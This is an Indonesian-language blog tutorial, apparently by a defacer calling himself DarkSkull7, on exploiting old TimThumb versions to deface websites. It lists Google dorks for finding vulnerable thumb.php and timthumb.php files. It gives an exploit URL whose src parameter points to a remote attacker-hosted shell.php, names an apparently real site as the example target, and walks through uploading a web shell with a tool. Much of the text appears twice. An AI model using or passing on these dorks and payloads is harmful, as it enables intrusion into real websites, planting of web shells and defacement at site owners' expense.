Tutorial Deface Poc Timthumb RCE
Oke Tod kali ini gua ./DarkSkull7, mau ngasih cara deface poc timthumb, disini gua bakal make tools nya CWD, oke langsung aja kita gassqueeN:v
Bahan-bahan :
- Hp/pc
- Internet
- Sabun ( Eh Bukan )
Exploit Buat Uploader :
- ?src=http://flickr.com.tukangpompajakarta.com/shell.php
Exploit Buat Timthumb :
- webtarget.com/timthumb.php
- webtarget.com/thumb.php
Dork :
- Inurl:/admin/thumb.php
- Inurl:/thumb.php
- Inurl:/thumb1.php
- Inurl:/timthumb.php
- Inurl:/admin/timthumb.php (Dork Kembangin Lagi Biar Makin Fresh Kaya Dia:v)
Note :- yang bisa dikasih exploit ini hanya timthumb versi 1.* ya
Seperti biasa, lu dorking dulu ajg :v
Nb : dorking di google image :)
Jika web nya vuln nanti bakal muncul seperti ini saat kasih exploit timthumb.
Langkah 2 :
Sekarang coba kita beri exploit buat uploadernya :v
webtarget.com/thumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php
Contoh :
http://img.yibo.net/thumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php
Nah jika dikasih exploit uploader jadi begitu, nanti eror (web tidak bisa di eksekusi secara manual) langsung aja Tod kita pake tools dari CWD
Langkah 3 :
Gmna cara menggunakanya? cek tutor di berikut
1. Lu taro web target lu di bagian atas
2. Pencet Execute
3. Nah muncul deh akses uploadernya :v
Langsung aja lu akses dan upload dah shell lu :v
Lalu gmna cara aksesnya jika shell sudah terupload??
Kalian pencet yang warna biru :b
Bahan-bahan :
- Hp/pc
- Internet
- Sabun ( Eh Bukan )
Exploit Buat Uploader :
- ?src=http://flickr.com.tukangpompajakarta.com/shell.php
Exploit Buat Timthumb :
- webtarget.com/timthumb.php
- webtarget.com/thumb.php
Dork :
- Inurl:/admin/thumb.php
- Inurl:/thumb.php
- Inurl:/thumb1.php
- Inurl:/timthumb.php
- Inurl:/admin/timthumb.php (Dork Kembangin Lagi Biar Makin Fresh Kaya Dia:v)
Note :- yang bisa dikasih exploit ini hanya timthumb versi 1.* ya
Langkah 1 :
Seperti biasa, lu dorking dulu ajg :v
Nb : dorking di google image :)
Jika web nya vuln nanti bakal muncul seperti ini saat kasih exploit timthumb.
Langkah 2 :
Sekarang coba kita beri exploit buat uploadernya :v
webtarget.com/thumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php
Contoh :
http://img.yibo.net/thumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php
Nah jika dikasih exploit uploader jadi begitu, nanti eror (web tidak bisa di eksekusi secara manual) langsung aja Tod kita pake tools dari CWD
Langkah 3 :
Gmna cara menggunakanya? cek tutor di berikut
1. Lu taro web target lu di bagian atas
2. Pencet Execute
3. Nah muncul deh akses uploadernya :v
Langsung aja lu akses dan upload dah shell lu :v
Lalu gmna cara aksesnya jika shell sudah terupload??
Kalian pencet yang warna biru :b
Btw Jangan Di Tebas Index Tod Kasian, Inget Sama Dosa hehehe
Gua nitip Nick ya:* ./DarkSkull7
Komentar
Posting Komentar
XDarkSkull7X